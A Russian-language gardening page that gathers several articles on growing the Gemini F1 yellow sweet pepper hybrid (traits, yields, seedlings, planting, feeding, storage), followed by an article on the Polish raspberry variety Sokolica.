0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец джемини или разбор полетов

Перец Джемини F1, или разбор полетов

Он узнаваем, среди желтоплодных гибридов один из ярких – в прямом и переносном смысле. Критических недостатков мало, ему прощают даже медленное окрашивание: одним из удачных называют перец Джемини овощеводы: мясистый, сладкий, длинные канареечно-желтые перцы по-настоящему крупны, вкусны, с толстой стенкой и сочной мякотью.

Назначение универсальное: для открытого грунта, закрытого – теплиц, парников и пр. Используется в свежем виде, для переработки, консервирования.
Ввиду невысокого роста используется в грунте открытом, в парниках, где выше и более продуктивен.

Gemini, гибрид от компании Bayer (Нидерланды), точнее, от дочерней компании Bayer Nunhems Zaden BV. Включен в Государственный реестр сортов РФ по Северо-Кавказскому региону, рекомендован к выращиванию в открытом грунте.

Распространяется дистрибьюторами, представителями и прочими компаниями – семена в России можно купить в расфасовках фирм Поиск, Урожай у Дачи и многих других. В Украине также широко известен. Расфасовка семян от 5 до 25 штук, профессиональная от 50 до 1000 штук. Всхожесть сохраняется 3-4 года.

При повторном посеве гибридных семян результат может быть непредсказуем – присущие гибридной форме качества чаще всего не сохраняются: видоизменяется форма, размер, вкус и пр.

Описание: коротко и по делу или Джемини во всей красе

Описание, т.н. официальная часть, характеристика от оригинатора, оценка выращивающих и от дегустаторов.

Завязывает от 5-8 до 7-10 плодов, и рост зеленой массы приостанавливается. Грамотно подобранная нагрузка, выбранный баланс между количеством завязи и зеленой массой – залог урожайности.

При повторном посеве чаще всего не сохраняет полностью присущих форме свойств: может измениться форма, оттенок при наливе, продуктивность, устойчивость к болезням и пр.

Урожайность промышленная товарной продукции 256-477 ц/га (сопоставим с эталонным Подарком Молдовы).

Химический состав: в плодах содержится на момент технической спелости

– сухого вещества 7.2%, сахара 2.8%, аскорбиновая кислота 35.3 мг на 100 г сухого в.-ва;
– на момент биологической: сухих в.-в. 9.6-9.8%, аскорбиновой кислоты 111 мг на 100 г сухого вещества.

  • Ранний гибрид, вегетационный период от посадки семян до начала сбора 75-82 дня.
  • Куст среднерослый – порядка 60 см, с полураскидистым габитусом, хорошо облиственный.
  • Лист от среднего до крупного, морщинистый, темно-зеленый. Развитая вегетативная масса защищает плоды от солнца.
  • Плоды кубовидного типа, точнее, кубовидно-удлиненные, четырехкамерные, пониклые. Формирует 7-10 плодов. Скорость окрашивания, перехода от технической спелости к биологической средняя – не высокая.
  • Толщина стенок 0.7-0.8 см, длина 18 см, ширина 9 см – приведены усредненные размеры. Плодоножка длинная, отрыв легкий. Цвет в технической спелости интенсивно-зеленый, на стадии полного созревания ярко-желтый.

Заявленный вес 320-400 г – по оценкам овощеводов, несколько завышен, отличается от реальных 200-250 г, получаемых овощеводами в открытом грунте, 300-350 в тепличных хозяйствах – приводится максимальный вес.

На фото сорт перца сладкого Джемини – окрашивается красиво, но уж медленно. Зато узнаваем по этому желто-зеленому колеру!

Вкус хороший в технической спелости, отличный в биологической: кожица в меру тонкая, мякоть сочная, типичный вкус сладкого болгарского перца с нетипичной нежной горчинкой – точнее, намеком на нее. Плоды относительно устойчивы к солнцу – не пекутся, редко подвержены солнечным ожогам.
Заявлена высокая устойчивость к вирусным болезням, в т.ч. вирусу картофеля.

  • Раннее и весьма дружное созревание, равномерность окрашивания;
  • Пусть не заявленный гигантский размер, но крупный, красивой правильной формы, однородной и привлекательной. Вид товарный – пригоден для коммерческого производства;
  • Вкус замечательный, сочный, хрустящий;
  • Компактный куст не несет избыточную зеленую массу, но достаточную, защищающую перцы от солнца.

Хозяину на заметку: о Джемини начистоту

Недостатки для фермера и дачника – есть и таковые:

  • Опытные овощеводы отмечают недостаточно быстрый переход от техспелости к спелости биологической, особенно в открытом грунте. Как основной критерии при выборе сорта для товарной плантации, недостаток наносит урон репутации желтоплодного гибрида;
  • Неравномерный окрас желто-оранжевых перцев – еще один недостаток;
  • При недостаточном питании, перегрузе тонкие стенки – вот такая беда приключается: 5-6 мм – всего лишь, для голландца с такой репутацией маловато будет – хмурятся аграрии;
  • Достаточно жаростойки, широкой затененной кроной прикрывают прикорневую зону. Возможно выращивание на мульчирующей пленке – в регионах Средней полосы России, на Украине показыл себя метод хорошо: корни не выпревают, нет выпадов в результате перегрева;
  • Крупный размер, разве что на салат его – сетуют некоторые заводчики, выращивающие в малом объеме для рынка. не самый товарный размер. С этим можно и спорить, и не спорить: кому крупные подавай, кому поменьше – не угодишь, не угадаешь;
  • Маловато будет – разводят руками привыкшие к небольшим плодам, но многочисленным. Да, порой результаты на отдельных кустах порядка 4-6 штук, но огромных удручают. Количество варьирует от максимальных 7-10 до указанного, корректируется формированием – пасынкованием, удалением нижних листьев и королевского бутона, внесением достаточного, но не избыточного количества минеральных удобрений (избыток азота не пойдет на пользу во время плодообразования: ботвы много, перца – мало);
  • Не совсем уж хрупкие, но ломаются ветки: требует подвязки, иначе выламываются под весом плодов.

Выращивание: растим большого-пребольшого Джемени

Выращивание – коротко об основных моментах агротехники: посадка, формирование и пр.

Семена высевают в пластиковые горшки, стакана 200 мл емкости, кассеты (при большом количестве) в конце февраля-начале марта, в южных регионах, на солончаках – в середине-конце февраля. Для получения ранней рассады – с конца января по начало февраля. Для зон, где температура пахотного слоя в начале-середине мая выше +15 °C – также более ранние сроки. Семена распространяются обработанные, дополнительных мер обработки не требуют.

Всходы можно наблюдать через 12-14 дней при температуре +22…+27 °C . До появления всходов поддерживают +24-25 °C – стоит отметить, Джемени теплолюбив. Подсветка – как минимум 12 часов. Для рассады поддерживается необходимый температурный режим, влажность воздуха.

В зависимости от зоны выращивания, посадку планируют на май-начало июня. Рассаду в открытый грунт высевают в возрасте 40-50 дней (не более 60 – считается переросшей, хотя для неотапливаемых теплиц, парников практикуют возраст и 65-70 дней), с 5-6 настоящими листьями, при высоте до 16-17 см.

Рекомендуемая правообладателем густота посадки 30-35 тыс/га (на капельном орошении, при ранних сроках). При поздних, при обычном поливе оптимальная густота выше – до 40-45 тыс/га.

Схема посадки 60-80-90 х 35-40-50 см. Для выращивающих в малых объемах средняя плотность – порядка 3 растения на м2.

Высаживают в открытый грунт ориентировочно при температуре воздуха не менее +13…+15 °C , температуры грунта от +13 °C . Посадочные гнезда заполняют питательной почвосмесью с использованием органики, минерального комплекса.

  • Почвы – легкие, чуть карбонатные. Предшественники – зерновые, бобовые, капуста и пр.
  • Оптимальная схема посадки – по крайней мере, рекомендуемая 50-60 см между кустами, в междурядьях 40 см. После посадки и полива прикорневую зону мульчируют – сохранится легкая структура ее, влажность. Так можно избежать трещин, корки (и необходимости рыхления), а также засоленности вследствие частого полива.
  • Гибрид интенсивного типа, отзывчив и даже требователен к подкормкам в период вегетации – это азотно-минеральный комплекс, магний, бор, фосфор, железо и пр.
  • На недостаток микроэлементов отвечает опадание листьев, слабым развитием вегетативной массы.
  • Азотная составляющая минимальна в период плодообразования, упор делают более на калийно-фосфорную, на кальций и микроэлементы – вносят их в виде листовых подкормок.
  • Первую подкормку вносят через 7-10 дней после высадки, вторую – во время цветения, затем, с интервалом, во время окрашивания.

Важно: не любит больших концентраций удобрений, особенно органических – при соприкосновении с навозом корневая система может получить ожог.

И еще важно: скорость интенсивность окрашивания зависит от количества минерального питания и его качества. Важно обеспечение калием, кальцием, магнием, бором.

Первый, королевский бутон удаляют. При тепличном выращивании возможно удаление первых плодов в центре.

Формирование: сладкий перец Джемини формируют чаще в один стебель, реже в два (в теплице).

Чего не любит: как и вся культура, заглубленной посадки, холода, пикирования, и частого окучивания.

В закрытом грунте обязательны подпорки (опоры): чтобы растения не полегали, ветви не обламывались. Каждый основной стебель крепится вертикальной бечевкой к подвязке при одному колышку, либо же горизонтально натянутые по обе стороны ряда две проволоки.

Снимают на хранение как в технической спелости, наступающей в конце июля – в начале августа. Оптимальная температура для зеленого перца +7…+9 °C .

Отзывы овощеводов: вся правда о Джемини

Овощеводы довольны высокой всхожестью посадочного материала, продуктивностью и, разумеется, вкусом – за годы выращивания перец Джемини отзывы имеет пусть не исключительно положительные, но в основном. И в основном без негатива.

Как выглядит перец Джемини покажет видео, а его вымышленные и явные достоинства и недостатки уже мы озвучили со слов фермеров и садоводов.

Решающим фактором выбора становится совокупность качеств – что бы там не говорили, интересная форма, размер, ранний съем, в целом немаленькая толщина стенок, урожайность, достаточная и для приусадебного хозяйства, и для фермерских посадок, в дополнение сортамента желтоплодных ранних. Еще один ключевой момент – стабильно высокое качество семенного материала, высокая всхожесть. Из минусов – они перечислены выше, добавить нечего.

Читайте также:

Почему его садят и будут садить – достоинства красавца, его проверенные качества в глазах овощевода на сегодня склоняют чашу весов в пользу неоднозначно лучшего, но весьма и весьма достойного среди голландских желтых гибридов. Доброго урожая!

Перец Джемини F1: описание + фото

Не секрет, что голландские гибриды овощных культур особенно ценятся дачниками и огородниками со всего мира. Болгарский перец не исключение. К примеру, гибрид под названием Джемини F1 славится высокой урожайностью, стойкостью к болезням и неприхотливостью к погодным условиям. С английского языка «Джемини» переводится как «близнецы». Это, скорее всего, связано с внешним видом спелых перцев: все они имеют одинаковую форму, размер и цвет. Ценят голландский сорт не только частные огородники, но и фермеры, выращивающие овощ в промышленных объемах.

Характеристику и описание голландского сорта, фото и отзывы о перце Джемини F1 можно найти в данной статье. Здесь будет рассказано обо всех достоинствах гибрида, а так же, о том, как его нужно правильно выращивать.

Особенности сорта

Перец Джемини F1 очень узнаваем: плоды этого сорта окрашены в насыщенный, канареечный желтый оттенок. Огородники любят Джемини за его высокую урожайность и отличный вкус, фермеры ценят неприхотливость сорта и превосходный товарный вид плодов.

Сорт перца Джемини имеет такие характеристики:

  • быстрое созревание – вегетационный период от посева семян до технической зрелости плодов составляет 75-82 дня;
  • средние размеры куста: растение компактное, среднеоблиственное, раскидистое;
  • высота кустов Джемини обычно находится в пределах 60 см;
  • листья на кустах крупные, морщинистые, темно-зеленого цвета (большое количество листьев и их крупные размеры защищают плоды от палящего солнца);
  • форма перцев кубовидно-удлиненная, пониклая;
  • на каждом кустике формируется около 7-10 плодов;
  • плоды четырехкамерные, толстостенные (толщина стенки, в среднем, составляет 0,8 см);
  • в состоянии технической спелости перец окрашен в темно-зеленый оттенок, о биологическом созревании свидетельствует ярко-желтый цвет плодов;
  • скорость окрашивания средняя;
  • длина плодов и их диаметр примерно равны – около 18 см;
  • средняя масса перцев зависит от способа выращивания: на грунте – 230 грамм, в теплице – 330 грамм;
  • вкус у сорта Джемини F1 отличный, в меру сладкий с едва заметной горчинкой – настоящий вкус болгарского перца;
  • кожица на плодах тонкая, а мякоть очень нежная;
  • культура устойчива к солнцу, плоды практически не пекутся, редко получают ожоги;
  • у сорта хороший иммунитет к вирусным заболеваниям, в том числе к картофельному вирусу;
  • предназначение перца Джемини универсальное – сажать его можно как в открытый грунт, так и в парник, теплицу или под пленку;
  • назначение плодов тоже универсально: они хороши в свежем виде, в различных салатах, закусках, горячих блюдах и консервации;
  • урожайность у Джемини высокая – около 350 центнеров с гектара, что сопоставимо с показателем стандарта урожайности, Подарка Молдовы;
  • гибрид неприхотлив к климатическим и погодным условиям, выращивать его можно даже в холодных регионах с прохладным и коротким летом;
  • созревают плоды дружно, собирать их легко, так как перцы хорошо отделяются от плодоножки;
  • товарный вид и лежкость у Джемини отменные, поэтому гибрид прекрасно подходит для выращивания на продажу.

Плюсы и минусы

Описание перца Джемини будет неполным, если не упомянуть о сильных и слабых качествах этого гибрида. Отзывы огородников свидетельствуют о том, что у Джемини F1 есть следующие достоинства:

  • раннее и одновременное созревание всех плодов;
  • красивый внешний вид перцев;
  • крупные размеры плодов;
  • отличные вкусовые характеристики, включая хрусткость и сочность мякоти;
  • компактные размеры кустов, позволяющие выращивать перец в небольших теплицах или под пленочными укрытиями;
  • хорошие показатели урожайности;
  • неприхотливость к климату;
  • стойкость к вирусным заболеваниям;
  • универсальное назначение плодов.

К большому огорчению огородников, идеального перца еще не существует в природе. Джемини, как и все другие сорта и гибриды, имеет свои минусы:

  • медленное окрашивание плодов – что ведет к потере некоторого процента перцев;
  • сильная зависимость гибрида от подкормок – при недостатке удобрений стенки перца становятся намного тоньше;
  • побеги Джемини достаточно хрупкие, поэтому кустики часто обламываются под весом крупных плодов – их необходимо подвязывать;
  • окрас плодов часто неравномерен, что сказывается на их товарности.

Правила выращивания

Вырастить голландский гибрид несложно, ведь он очень неприхотлив и стоек к внешним факторам. Огородник должен помнить о гибридном происхождении Джемини: семена этого перца не сохраняют полную информацию о генах – плоды будут мутировать, менять окраску, размеры или форму. Поэтому посадочный материал придется покупать ежегодно.

Посадка

В южных регионах семена Джемини F1 начинают сеять уже во второй половине февраля. В более холодных областях овощ сеют на рассаду несколько позже – в первой декаде марта. Если нужна ранняя рассада для отапливаемой теплицы или парника, необходимо сеять перец уже в январе.

Семена лучше сеять в пластиковые стаканы емкостью 200 мл или в специальные торфяные таблетки, чтобы впоследствии рассаду не пришлось пикировать – перец плохо переносит эту процедуру.

Сладкий перец Джемини любит тепло и свет. Первые 12-14 дней емкости с семенами должны находиться при температуре 24-27 градусов. За это время появятся первые всходы, тогда рассаду перца можно убрать в более прохладное, но светлое место.

Когда перцу будет 40-50 дней, его высаживают на постоянное место. В зависимости от того, где будет выращиваться Джемини, меняются и рекомендуемые сроки посадки: в теплицу рассаду переносят в середине мая, а в открытый грунт сладкий перец можно сажать не раньше первых чисел июня.

Высота рассады перца к моменту пересадки должна составлять 16-17 см, на каждом кустике уже должно быть по 5-6 настоящих листочков. Допустимо наличие цветочных завязей. Но не рекомендуется передерживать рассаду болгарского перца. В 65-70-дневном возрасте Джемини высаживают только в отапливаемые парники, делают это в середине весны.

Посадка перца Джемини на постоянное место осуществляется по таким правилам:

  1. Выбирают участок на ровном месте или на небольшой возвышенности.
  2. Хорошо, если есть защита от сильного ветра и сквозняка.
  3. Почвы предпочтительны питательные, рыхлые, карбонатные.
  4. Лучшими предшественниками для болгарского перца считаются капуста, бобовые культуры и зерновые.
  5. Схема посадки при небольших объемах составляет три куста на квадратный метр.
  6. Лучшую урожайность Джемини показывает при такой схеме – 50х40 см.
  7. Почва на участке или в теплице должна прогреться хотя бы до +15 градусов.
  8. Посадочные лунки рекомендуется заполнить питательной почвосмесью с примесью органики или минеральных удобрений.
  9. Сразу после посадки рассаду перца поливают, а почву вокруг корневой шейки мульчируют. Мульча защитит корни от перегрева и переохлаждения, поможет удерживать влагу.

Заявленная оригинатором сорта урожайность перца Джемини на практике может сильно варьироваться. Этот показатель во многом зависит от питательности почвы, количества и качества подкормок. Болгарский перец не будет расти самостоятельно, этой культуре нужен уход.

Ухаживать за Джемини F1 нужно так:

  1. Почву покрывать мульчей или постоянно рыхлить, удалять сорняки, следить за увлажненностью.
  2. Использовать систему капельного орошения или поливать кусты вручную, не допуская растрескивания грунта и оголения корней.
  3. Оборвать первые «королевские» бутоны.
  4. Формировать рассаду перца в один или в два стебля, удаляя лишние пасынки.
  5. В теплицах лучше оборвать центральные завязи, чтобы не допустить мельчания плодов.
  6. Подвязывать кусты, когда плод начнет наливаться и увеличиваться в размерах.
  7. Если понадобится, нормировать количество плодов, оставляя не более десяти штук на каждом растении.
  8. Подкармливать перец Джемини нужно обязательно. С осени землю заправляют органикой, а летом подкармливают этот гибрид только минеральными удобрениями. Подкормок должно быть как минимум три: первый раз через неделю после посадки, второй – в фазе цветения, третья подкормка осуществляется, когда плоды начинают менять цвет.

Отзыв

Заключение

Отзывы огородников и фермеров о перце Джемини противоречивые. Большинство аграриев отмечает крупноплодность сладкого овоща и его хороший вкус. Сорт ценится за неприхотливость и стойкость к вирусным болезням, но нуждается в хорошем уходе и частых подкормках минеральными компонентами.

При грамотном уходе гибрид порадует высокими урожаями и равномерной окраской плодов. Товарные качества Джемини на высоте!

Обзор раннего перца Джемини

Одним из самых популярных и доступных сортов болгарских перцев является «Джемини». Слово пришло из английского языка и имеет значение – близнецы. Вероятнее всего такое название сорт получил благодаря сильной схожести всех плодов, растущих на кустарниках. Какими еще особенностями обладает этот вид болгарского перца и рекомендации по уходу за культурой вы узнаете, ознакомившись с этой статьей.

Особенности и характеристики сорта

О перце сорта «Джемини» знает практически каждый садовод. Он имеет свои отличительные особенности, которые позволяют ему выделяться среди прочих сортов перцев. Данная овощная культура обладает ярко-желтым (канареечным) цветом. Сорт славится высокими показателями урожайности, сочным вкусом, отменным товарным видом и неприхотливостью в уходе.

Кусты

Кустарник имеет средний размер, достаточно компактен. Средне облиственное, не раскидистое растение. Максимальная высота куста приблизительно 65 см.

Листва достаточно крупная, имеет серо-зеленый оттенок. Огромный размер листьев позволяет защищать перцы от солнечных лучей. На одном кустарнике может созреть не более 9 плодов.

Плоды

Перец обладает толстыми стенками, толщина которых может достигать 8 мл. Техническая спелость характеризуется окрашиванием плодов в приглушенно зеленоватый цвет. Биологическую спелость можно определить по насыщенно желтому оттенку плодов.

Показатели длины и ширины плода практически совпадают, порядка 17 см. Условия выращивания кустарника «Джемини» влияют на массу перца. К примеру, средний вес плодов, выращенных на открытых грядках – 240 г, в тепличных условиях – 320 г.

Перец обладает тонкой кожурой и нежнейшей мякотью. Располагает сладким вкусом с ноткой горчинки.

Урожайность

Показатели урожайности данного сорта болгарских перцев высокие, порядка 300 ц со 100 соток земли. Такой объем урожая, на сегодняшний день, способен дать только сорт «Подарок Молдовы». Однако его плоды гораздо меньше и дозревание проходит чуть дольше.

Как растет перец Джемини и другие сладкие голландские крупноплодные гибриды в теплице – узнайте из видеоролика:

Устойчивость к болезням и вредителям

Данный сорт перцев обладает неплохими защитными качествами к разному роду вирусным заболеваниям, одним из которых является картофельный вирус. Овощная культура прекрасно адаптируется даже к самому неблагоприятному климату.

Достоинства и недостатки перца Джемини

Для каждого сорта овощной культуры свойственно обладать как положительными, так и отрицательными качествами. Начнем с достоинств, которые присущи сорту перцев «Джемини»:

  • быстрое созревание плодов;
  • все плоды созревают одновременно;
  • прекрасный товарный вид;
  • крупный размер перцев;
  • сочная мякоть с хрустящей кожицей;
  • сладкие и приятные на вкус плоды;
  • компактность кустарников позволяет сажать их даже на самом небольшом участке;
  • богатый урожай;
  • способность растения адаптироваться к неблагоприятным погодным условиям;
  • иммунитет к вирусам и инфекциям;
  • универсальность в использовании (приготовление салатов, консервация и т.д.).

Несмотря на значительное количество плюсов, у данного сорта все же есть недостатки:

  • Развитие плодов во многом зависит от качества и частоты использования удобрений. Без дополнительной подкормки кожура перцев истончается, а мякоть теряет сочность.
  • Побег у перца «Джемини» довольно хрупок. Это часто приводит к обламыванию куста из-за внушительных размеров плодов. Растение требует дополнительной опоры.
  • Неравномерное окрашивание перцев – обычное дело для сорта «Джемини». Неравномерный оттенок плодов снижает товарность овощной культуры.

Правила выращивания

Процесс выращивания голландского перца не так сложен, как может показаться на первый взгляд, ведь как уже упоминалось ранее, селекционером удалось вывести не требовательный к уходу сорт.

Тому, кто отдаст свое предпочтение перцам «Джемини», необходимо помнить, что семя этого сорта не способно хранить генетический материал. Это означает, что плод будет подвергаться мутации, сменять оттенок кожуры и размер. Следовательно, встает необходимость в приобретении семян каждый год.

Выращивание рассады

Для каждого семени желательно приготовить отдельный торфяной горшочек. Это позволит в будущем не пересаживать саженцы, так как они достаточно тяжело переносят пикирование.

Данный сорт очень теплолюбив и зависим от освещения, особенно на первых этапах жизни. На протяжении двух недель после посадки сеянцев поддерживайте температурный режим в пределах от 25 до 30 градусов.

Сроки, посев, оптимальная почва

Для выращивания данного сорта потребуется обзавестись очень лёгким грунтом. Он должен обладать двумя главными качествами – быть богатым на питательные вещества составом и иметь прекрасную дренажную систему.

Подготовить почву к рассаде можно самостоятельно в домашних условиях. Для этого смешайте перегной, грунт и песок, в соотношении 2:1:1. После наполнения тары, под рассаду, землей, позаботьтесь о требующемся температурном режиме. Он должен находиться в пределах +25…+29 градусов.

Если в дальнейшем планируется пересадка перца в теплицу или на грядку, то посеять семена болгарского перца желательно в первые дни марта. Семена помещают в слегка влажную почву и присыпают сверху землей. Глубина каждой лунки должна быть не больше 3 см. В противном случае созревание саженцев займет большее количество времени.

Уход за рассадой

Уход за сеянцами заключается в поддержании необходимого уровня влажности почвы и температурного режима. При следовании всем рекомендациям первые ростки начнут появляться уже на 12-14 день. Не забывайте, что болгарские перцы очень чувствительны к отсутствию света, поэтому стоит задуматься о приобретении люминесцентной лампы. Световой день болгарских перцев равен 12 часам. При дефиците света, у растения запускается процесс деформации.

При появлении 3-х листьев на саженце, внесите в грунт минеральное удобрение. Для его приготовления потребуется приобрести такие вещества как калий (1 г), суперфосфат (3 г), аммиачная селитра (3 г) и вода (1 л). Вносите такое удобрение каждые 14 дней, пока кусты не окажутся на грядках.

Вырастить здоровую рассаду перца «Джемини» поможет следующий видеоролик:

Посадка рассады в открытый грунт

На 50-ый день перец пересадите в открытый грунт. От того в каких условиях будет выращиваться данный сорт зависит время посадки рассады. Например, если кустарники будут расти в тепличных условиях, то рекомендуемая дата пикирования конец мая. Для выращивания на открытых грядках, саженцы перцев сажают в первую неделю июля.

Главным показателем того, что растение нуждается в пересадке является его высота. Она должна быть в пределах 15-19 см. Каждый кустарник должен обзавестись как минимум 6-7 созревшими листьями. На растении уже могут появиться соцветия и цветочные завязи.

Стоит отметить, что передерживание рассады может привести к тому, что при высадке в открытый грунт куст вероятнее всего не приживется и со временем начнет увядать.

При посадке перца убедитесь, что грунт плодороден, предварительно удобрен питательными веществами и имеет рыхлую текстуру. Не забывайте и о правиле севооборота. Наиболее предпочтительным участком является предыдущее место выращивания белокочанной капусты, бобовых и зерновых культур.

Посадка перца данного сорта не имеет характерных особенностей от простого высаживания перца в почву. Проделайте небольшие отверстия в земле и сдобрите их минеральной подкормкой. После пересадите перец в лунки прямо с земляным комком. Проведите легкое мульчирование вокруг лунки и полейте саженцы.

Уход за перцем Джемини

Как уже упоминалось ранее, сорт перцев «Джемини» не прихотлив в уходе и содержании. Однако, как и любая другая овощная культура нуждается в своевременном поливе, мульчировании и удобрении.

Полив

Поливайте перцы исключительно теплой отстоявшейся водой. Рекомендуется осуществлять полив утром. Это позволит влаге сохраняться в грунте на протяжении всего дня, а не испариться днем под воздействием солнца.

Поливайте не больше одного раза в 5 дней. Чрезмерно влажная земля может спровоцировать возникновение и размножение вредных насекомых.

Подкормки

Удобряют саженцы трижды за весь сезон, не более. Перекармливать растение, хоть и полезными веществами не стоит. В первый раз подкормка вносится спустя 7 дней с момента пересадки рассады в грунт. Во второй раз – в момент возникновения соцветий, прибегают к помощи удобрения, в основе которого лежит фосфор и калий. Заключительным моментом внесения подкормки является формирование перца.

Стоит упомянуть, что данный сорт категорически не переносит такого вещества как хлор. Поэтому при возможности откажитесь от внесения минеральных удобрений в которых присутствует этот химический элемент.

Созревание

Сорт «Джемини», как и другие болгарские перцы, обладает двумя стадиями созревания – технической и биологической. Для первой характерно наличие светло-зеленоватого оттенка кожуры, в то время как на биологической стадии перцы «Джемини» приобретают свой знаменитый канареечный оттенок.

Для того, чтобы ускорить процесс созревания, технически спелые перцы срывают с кустарников и отправляют в затемненное теплое место. Спустя пару суток перцы приобретут свой красивый оттенок и будут готовы к употреблению. Искусственное дозревание позволяет существенно ускорить процесс сбора урожая.

Сбор и хранение урожая

Срывать перцы необходимо с крайней осторожностью, дабы избежать травм ветвей кустарника. Если промедлить со сбором урожая, то можно спровоцировать остановку роста следующего. Всего за вегетационный период собирают от 4 до 6 урожаев болгарских перцев. Финальный сбор урожая происходит за пару суток до наступления первых морозов.

Корректная сортировка перцев данного сорта является одной из важных составляющих хранения. Для начала разложите плоды, полагаясь на следующие факторы – спелось и размер. Как и многие другие овощные культуры болгарский перец «Джемини» обладает невысокой лёжкостью, то есть способностью сохранять свой товарный вид на протяжении долгого времени.

При отсутствии должного ухода, перцы начнут гнить уже спустя трое суток. Чтобы этого не произошло необходимо придерживаться следующих рекомендаций:

  1. Отбирайте на хранение перцы без каких-либо повреждений (трещин, царапин, вмятин и пятен).
  2. Для продолжительного хранения подходят только технически созревшие плоды.
  3. Обратите внимание на стенки перца. Если на кустарнике выросли плоды с тонкими стенками, рекомендуется отправить овощи на хранение в морозильную камеру.
  4. Оставленные на хранение перцы должны пройти небольшую предварительную подготовку. Для этого достаточно лишь отрезать плодоножку.
  5. Для удобства хранения прибегают к помощи различных тар. Это может быть деревянный ящик или обыкновенный полиэтиленовый пакет. Последний вариант предпочтительнее, поскольку при закрывании в пакете производится углекислый газ. Всем известный факт, что углекислый газ способен вытеснять кислород. Таким образом внутри пакета создаётся своего рода «микроклимат», позволяющий любому продукту сохранить свои вкусовые и внешние качества.

Ко всему прочему перцы «Джемини» допустимо хранить в корзинах или на полках в подвальном помещении. Единственным условием является поддержание одного и того же температурного режима. Он должен быть в пределах от 9 до 12 градусов.

Уровень влажности не должен быть менее 85 %. Альтернативой полиэтиленовому пакету может стать обычная бумага. Обернутые болгарские перцы бумагой способны сохранять свои вкусовые качества и свежий товарный вид почти до двух месяцев.

Еще одним не менее важным нюансом хранения перцев «Джемини» является запах. Дело в том, что плоды этого сорта крайне восприимчивы к посторонним запахам и довольно легко их впитывают. Убедитесь, что емкость в которой планируется поместить на хранение плоды, абсолютно чистая.

О малине Соколица или новинки из Польши

Без поспешных выводов и оценок. Без рекламных прокламаций и предубеждения. Среднеранняя, светло-красная, плотная, с достойным, но не десертным вкусом — какая на самом деле малина Соколица, одна из новинок польского сортамента? Заменит ли сорт коммерческие, пригоден ли в качестве промышленного, что важно знать фермеру и садоводу.

На сегодняшний день достоверных данных о промышленной урожайности в условиях Украины, России нет. Сложно без без убедительных цифр, предоставленных заслуживающих доверия источниками разобраться в достоверности информации, сравнить сорт с предшественниками из Бржезна и сделать соответствующие выводы: садить или не садить, тратить ли время или иметь дело с проверенной годами культурой. Предоставим описание, характеристику сорта — по данным, завяленным оригинатором и отзывам, полученным от заводчиков.

О малине Соколица — характеристика, описание

Малина Sokolica получена в Польше, Институт Садоводства в Бржезне. Пополнила польский сортамент в 2010 г, на рынке России, Украины, Белоруссии с 2011 г. Несет в себе гены проверенных устойчивых сортов Polana Malling Promise Kanabi. Авторство принадлежит селекционерам Яну Данеку и Агнежке Орел. Используется для традиционного производства — в открытом грунте, реже в закрытом — пленочных тоннелях, теплицах, в любительском саду. Назначение — десертное, для переработки, направление — коммерческое в средних объемах, малое производство для свежего рынка.

Среднего созревания — третья либо последняя декада июня, сроки плодоношения относительно Lazka (на которую культура, по отзывам, весьма и весьма похожа) отличаются на 5-7 дней — чуть запаздывает. По некоторым отзывам, в год посадки может давать не типичное плодоношение на побегах текущего года, проявляя черты ремонтантности.

Что касается урожайности, данных пало. Если заявленная оригинатором продуктивность Лачки составит от 170 до 200 ц/га при уплотненной схеме посадки 2 х 0.5 м, то Соколица при интенсивной агротехнике предположительно сопоставима — ключевым словом пусть будет предположительно.


На фото малина Соколица, второй год плодоношения: результат неплох, хотя агротехника желала лучшего
  • Куст среднераскидистый, побеги высотой 1.7-2 м (чуть ниже Лачки), с малочисленными неострыми шипами на стеблях и плодовых веточках — шипы темно-коричневые, тонкие, мелкие, единичные, располагающимися в верхней части.
  • Лист средние величины, морщинистый, узкий, с узкими зубчиками, ярко-зеленый, средне-скрученный.
  • Ягоды веретенообразные — удлиненные, в виде усеченного конуса, крупные и очень крупные. Вес в средней массе 5-7 г.
  • Цвет ярко-красный, присутствует умеренный блеск. Костянки крупные, одномерные, хорошо сцеплены. Плотная, сочная, но в меру — хороший твердый сорт для транспортировки. По отзывам, очень красивы — правильная удлиненная форма, более светлый в сравнении с Лачкой цвет (по мнению части заводчиков, в привлекательности ей не уступают, во вкусе — по мнению некоторых превосходят, по отзыву других — уступают. ).
  • Морозоустойчивость хорошая, на уровне стандартных европейских сортов.

По мнению польских аграриев, культура жаростойкая, засухоустойчивая, хотя во время пика высоких температур плоды могут подпекаться — впрочем, явление практически неизбежное.

Также есть упоминание о нелюбви корневой системы к избытку влаги в грунте и воздухе, избыточному поливу — на заметку практикующих выращивание в тоннелях, теплицах.

.. и про уход

Высаживают в грунт осенью после листопада, т.е. по окончанию сокодвижения либо весной в более холодных регионах. После посадки ямы либо траншеи, заправленные питательной смесью, обрезают побег до высоты 25-30 см. В районах с малоснежными суровыми зимами посадки можно укрыть агротканью.

При схеме посадки ленточным методом расстояние между кустами 50-70 см. При кустовом методе — порядка 1.5 м между растениями.

В середине-начале мая, по достижению растениями 80-90 см, прищипывают точку роста, тем самым увеличивая боковое ветвление.

Предположительная густота посадки — не более 10 побегов на м2, а лучше всего 6-7, чтобы увеличить площади питания, сократить нагрузку. Последний вариант устроит садовода и практикующих выращивание в малых объемах для свежего рынка. Первый больше подойдет для крупных плантаций, где целесообразен уплотненный метод посадки, увеличивающий урожайность с м2.

Нужна ли опора — вопрос правильный. И правильный ответ — нужна, хотя возможно выращивание и без нее. Несмотря на сравнительно умеренный рост, жесткость при высадке траншейным методом организуют опоры высотой до 2 м по многим причинам. Подвязка способствует более интенсивному росту, более упорядоченному расположению стеблей и плодовых веточек, а значит, их лучшей освещенности и проветриванию. При отсутствии загущение удобно работать с насаждениями, облегчен в разы сбор.

Что касается подкормок — схема удобрения стандартная для малины разового плодоношения: ранней весной комплексные микроудобрения с достаточной долей азота, до цветения и на стадии завязи вносят методом фертигации, а также листовые подкормки, несущие большую долю калия, кальция, фосфора, железа и прочих микроэлементов в быстро усваивающейся форме.

Отплодоносившая лоза выкашивается, молодая поросль остается на следующий год. Не дожидаясь глубокой осени, стоит внести комплексное удобрение, органику — перепревший навоз, торф. Мнение о необходимости внесения органики осенью часто подвергается критике, поэтому что именно вносится — дело хозяйское, важен сам факт сбалансированного и своевременного питания.

Отзывы

